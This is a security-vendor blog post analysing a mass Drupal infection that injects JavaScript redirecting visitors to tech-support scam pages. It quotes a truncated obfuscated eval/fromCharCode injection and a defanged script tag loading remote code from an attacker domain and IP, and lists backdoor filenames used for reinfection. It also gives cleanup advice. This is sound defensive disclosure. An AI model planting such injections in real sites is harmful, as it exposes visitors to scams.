• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Drupal Infections - Tech Support Redirect

Massive localstorage[.]tk Drupal Infection

May 8, 2018Denis SinegubkoEspanolPortugues

72
SHARES
FacebookTwitterSubscribe

After a series of critical Drupal vulnerabilities disclosed this spring, it’s not surprising to see a surge of massive Drupal infections like this one:

Massive #Drupal infection that redirects to "Tech Support" scam via "js.localstorage[.]tk" https://t.co/30ZeLIyfza pic.twitter.com/ZCPMepM74k

— Denis (@unmaskparasites) April 24, 2018

… with over a thousand compromised sites that redirect visitors to “Tech support” scam pages.

Malicious Injections

The infected pages contain the following JavaScript code, which is injected into various .tpl.php, .html.twig and .js files.

eval (String .fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, ...skipped... 100, 40, 122, 41, 59));

The code injects a remote script from hxxps://js.localstorage[.]tk/s.js?crt=new, which is responsible for the malicious redirects.

This script is also being injected into various locations in the database in plain text:

<script type="text/javascript" src="hxxps://js.localstorage[.]tk/s.js?qr=888"></script>

Alternatively, the script can be loaded from hxxp://193.201.224 .233/m.js?d=3.

This variation can also be found on some WordPress sites.

Reinfections

Removing the malicious JavaScript code from the infected files and the database is not enough. Hackers also create multiple files that frequently check if they contain malicious code then reinfect them if the code is not found. These files have random filenames like “g.php”, “tonure.php”, “jooner.php”, “almio.php”, etc.

Advise for the rest of the community…
Search for tonure.php, jooner.php, almio.php, cciawwi folder viawwi folder
All of these files are being requested every minute

— Cosy Studios (@CosyStudios) May 1, 2018

Here’s their code, which searches for .tpl.php, .html.twig, header.php, and drupal.js files and then injects the malicious JavaScript into them.

Malware Injector

As you might have noticed, it tries to inject the malware into files starting from a directory three levels above the current file (../../..). This means that this code may infect all neighboring sites that share the same server account with the current site.

Mitigation

To clean this infection, one needs to fully patch and upgrade Drupal (as of this post, at least to Drupal 7.59, Drupal 8.5.3, or Drupal 8.4.8, depending on the branch you are using). Next, you’ll need to find and remove all the backdoors (don’t forget to check for malicious cron jobs), and then remove the injected malware from the infected Drupal files and database.

Attempting to remove the infection in a different order may result in reinfection before you finish the cleanup. You can find complete step-by-step instructions in our guide How to clean a Hacked Drupal Website.

Using a website firewall that proactively patches your sites against new threats will help if you don’t monitor news about discovered vulnerabilities or are unable to patch your site as soon as patches are released.

72
SHARES
FacebookTwitterSubscribe

Categories: Drupal Security, Website Malware InfectionsTags: Hacked Websites, Malware Updates

About Denis Sinegubko

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him not online at all. Connect with him on Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

The Anatomy of Website Malware Webinar

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.